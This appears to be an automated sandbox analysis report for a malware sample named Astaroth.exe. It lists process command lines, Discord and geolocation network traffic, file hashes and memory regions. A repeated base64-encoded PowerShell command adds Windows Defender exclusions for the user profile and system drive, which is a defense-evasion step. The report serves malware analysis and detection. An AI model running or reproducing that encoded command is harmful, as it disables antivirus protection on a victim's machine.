"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 gateway.discord.gg udp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 8.8.8.8:53 234.130.159.162.in-addr.arpa udp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.137.232:443 discord.com tcp
DE 159.89.102.253:443 geolocation-db.com tcp
DE 159.89.102.253:443 geolocation-db.com tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
DE 159.89.102.253:443 geolocation-db.com tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
DE 159.89.102.253:443 geolocation-db.com tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
DE 159.89.102.253:443 geolocation-db.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
DE 159.89.102.253:443 geolocation-db.com tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.137.232:443 discord.com tcp
DE 159.89.102.253:443 geolocation-db.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
DE 159.89.102.253:443 geolocation-db.com tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
DE 159.89.102.253:443 geolocation-db.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
DE 159.89.102.253:443 geolocation-db.com tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.130.234:443 gateway.discord.gg tcp
US 162.159.137.232:443 discord.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\system.exe

MD5 a6fd55f1f13b0b71ac19c900593f51d9
SHA1 6339d97a1a97ba2531551aba4cb06eedd9d7c12a
SHA256 431f51f4ab1544899916bace447a602dc21386310a92677e0e96d22ece2a7b56
SHA512 a161d6876e0df731130718b22c466b39d95508749311e2cc5579b2e629cf9838054421b03b47acc50e37c12dfe5ca0f8d0fc75a71dacaceb7d591193784101c2

memory/5004-12-0x00007FFE17283000-0x00007FFE17285000-memory.dmp

memory/5004-11-0x000001C976370000-0x000001C976388000-memory.dmp

memory/5004-13-0x000001C978AE0000-0x000001C978CA2000-memory.dmp

memory/5004-15-0x00007FFE17280000-0x00007FFE17D42000-memory.dmp

memory/2416-16-0x0000000002740000-0x0000000002776000-memory.dmp

memory/2416-17-0x0000000005340000-0x000000000596A000-memory.dmp

memory/4956-19-0x0000000004B80000-0x0000000004BA2000-memory.dmp

memory/4956-21-0x0000000005420000-0x0000000005486000-memory.dmp

memory/4956-20-0x0000000004D20000-0x0000000004D86000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_socklxkz.54u.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4956-22-0x0000000005590000-0x00000000058E7000-memory.dmp

memory/2988-48-0x00000176D03D0000-0x00000176D08F8000-memory.dmp

memory/2416-58-0x0000000005F60000-0x0000000005F7E000-memory.dmp

memory/2416-59-0x0000000006500000-0x000000000654C000-memory.dmp

memory/2416-79-0x0000000007170000-0x00000000071A4000-memory.dmp

memory/2416-89-0x0000000006570000-0x000000000658E000-memory.dmp

memory/2416-80-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

memory/2416-90-0x00000000071B0000-0x0000000007254000-memory.dmp

memory/4956-91-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

memory/2232-108-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

memory/2416-117-0x0000000007900000-0x0000000007F7A000-memory.dmp

memory/2416-118-0x00000000072C0000-0x00000000072DA000-memory.dmp

memory/2416-120-0x0000000007350000-0x000000000735A000-memory.dmp

memory/3416-129-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

memory/2232-138-0x0000000007B30000-0x0000000007BC6000-memory.dmp

memory/2416-140-0x00000000074D0000-0x00000000074E1000-memory.dmp

memory/1888-149-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

memory/2232-159-0x0000000007AF0000-0x0000000007AFE000-memory.dmp

memory/4956-168-0x0000000007000000-0x0000000007015000-memory.dmp

memory/5096-169-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

memory/4956-179-0x00000000070F0000-0x000000000710A000-memory.dmp

memory/4968-189-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

memory/4956-200-0x00000000070E0000-0x00000000070E8000-memory.dmp

memory/2556-198-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

memory/2576-217-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

memory/5264-244-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

memory/5588-262-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 23b7371a9b8662e17661d35d484211ed
SHA1 c9f83e685d35c5a6e6360e8e67f4d564eb737ee5
SHA256 1d39ff6613b02f75929d271db0e55452a42a560da36df2644269c45f0dd81e4d
SHA512 a2e87f64d9ff7fd91b7d76f7c953a6a9fb64d83c79637d6a745a3f42ab07b74a568fe0c7fa46de0106b6312d87975a36f750a42f31ccde2575394d80138b1422

memory/5920-291-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 ac4917a885cf6050b1a483e4bc4d2ea5
SHA1 b1c0a9f27bd21c6bbb8e9be70db8777b4a2a640f
SHA256 e39062a62c3c7617feeeff95ea8a0be51104a0d36f46e44eea22556fda74d8d9
SHA512 092c67a3ecae1d187cad72a8ea1ea37cb78a0cf79c2cd7fb88953e5990669a2e871267015762fd46d274badb88ac0c1d73b00f1df7394d89bed48a3a45c2ba3d

memory/1560-302-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

memory/2480-312-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

memory/6184-338-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

memory/6460-356-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 535b473ec3e9c0fd5aad89062d7f20e8
SHA1 c900f90b3003452b975185c27bfb44c8f0b552c4
SHA256 f6bb190101537e41901392fb690045c5bf1cddaa954630e57c5d0b3410b2d6b0
SHA512 33f286b06e9198ca8ae5225c7796f0f176282e2386fa93a2450e1a65cdb235932ef8a0a778f6b16945f1496a5e12e3ba6e3905f02a47a9cbb92e14448f463c86

memory/6864-369-0x0000000073CD0000-0x0000000073D1C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a2c47ebd6f9c0c7a2b6dfd11134a32e7
SHA1 058941f5ecb2fc474ee8aff5de5d49717ef74727
SHA256 c73978c0ac93a83514b1eeae264e87e9e075c9b7bb4d655538218d37a11c35f6
SHA512 46ae110e07c640f2238ee7dd7bf04b7d98a6013863b2903e7b9f3e16d4c31a52ffb60bff0a640466934e12bbe6b0473c87a93aca3162a06e5f4c2d3b30d2b400

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d59cf70b8ddf763470677e129c316274
SHA1 7dea93838860bcabce7d784c2ac40155e2467e7d
SHA256 87aea0f44a89f325be5db37b6d36a241c486fa27c4c332e84aa3a207ee0130a2
SHA512 343206be1fb5e26cd0facc9e0f58474ea4bfeb815a801202284da62c6ea92469fc8836a37dfd3ae9c018be995e61b88e09d21d8830f09b4698c2d6a184338911

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 dca12cb41dc85a3b12e1d1b4ba9ee9a5
SHA1 3a408fb4e15518049266b9161d759d9ae2caabb1
SHA256 255907c1f4d2e605a1ec9fa09c3a34b2d98a59e006a42d6980c236679664052e
SHA512 968f6a3c158f5c56f5828c4311a6fb274aa35ad72123eb5be7e179f425e7292488eca64800f257bae640b8fe1f05ece822e449fa23f652b13787a892d8d5c8b5

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 156557f9f5b4a3e093c80c62b15987b3
SHA1 d42c6a2fb2a5ef7a5bcf8afa622f16c852fde12c
SHA256 6c15dc3c52d2a64cd99d91df2701c04ed005b65900be75f23459fad555558d3f
SHA512 5b4e0190fe2a863fe292b1e3f25a60b2337edc122ef08377c7f4a11c2c3b526419d39de0fd5e846c046ef047c98f7bc13e0cfe5ead9ccd0e0c50262e6b5b3acf

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6fa2ce1f781ef8b2283ac643098f55d2
SHA1 a6238114cc583316a4c6442d50d3a52be3f67f3a
SHA256 80e226f71dc46157fb1fba62d4276502cb4e9e18d9fe4d66d83bb611639a1e6b
SHA512 a559b90a5418e4e3908c3b0cdae3f77cd6d9d2407b517a598a5cb9e62a149626c9c3b9596f3011831f87bd659149d004cbbebf27abea870b1c31bee7250722db

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d870b47f0ec9514e878b2f180ce777b4
SHA1 67d35573848d06299c9e16d83ce605fa4f6c05b9
SHA256 0de7c2857096ad7edfa63eb668ef725a1340c20d1bbc3e50adbb59e78613abd4
SHA512 8aea7af34768d4dda8843b395ef41864f6fc0f37dd2d52bdb56fb6997fc4d2391dde6597c44ae505fafcd161ec537761e621e629bee3c069b6b40ac3b6978b73